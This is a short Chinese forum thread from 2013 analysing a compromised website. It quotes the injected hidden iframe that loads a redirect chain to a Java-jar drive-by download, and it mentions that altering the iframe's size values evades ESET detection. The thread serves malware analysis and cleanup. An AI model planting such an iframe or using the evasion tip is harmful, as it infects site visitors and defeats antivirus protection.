http://discountsmokelesscigarettes.com/

dayangyang

这个网页报毒的原因是最后一句：

1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://greggauthier.com/aazd.html?i=3294538></iframe></body>
   
2. </html>

复制代码

这段代码 应该已经被杀毒软件认为是木马的特征码
如果有兴趣，可以单独把这段代码拷入txt中，然后改后缀名为com看看杀毒软件的反应
然后再随便改下高宽数值，eset就不会报了

当然杀软这样报是有原因的= =因为这就是个马：

先看看这个greggauthier.com/aazd.html?i=3294538
运行后发现是一个跳转--到http://goxserv.com/aazd.html?i=3294538
会要求运行JAVA插件。。里面有一个jar程序。。但是这个jar程序的名称是随机的，如4ag.jar，x01.jar等等

另外就是这段代码在被挂马主页上是自动生成的。就算管理员删了还是会有。。需要删除网站目录下另外一个注入程序

参考：
http://blog.sucuri.net/2013/02/large-scale-compromises-leading-to-tds.html
http://wewatchyourwebsite.com/wordpress/2013/02/twitter-iframes/

蓝核

我跟你的思路不一样……我么有细究那么多……我只知道这个不应该出现，话说4月23号晚上墨家小子的毒网建议去试试

dayangyang

蓝核 发表于 2013-4-24 00:03
我跟你的思路不一样……我么有细究那么多……我只知道这个不应该出现，话说4月23号晚上墨家小子的毒网建议去 ...

这个就是那里面的一个。。。刚才又解了一个。。。

蓝核

泪。。。这个网站我记得是我这边打不开。。。你加油，明天早上该有的辛苦费不会少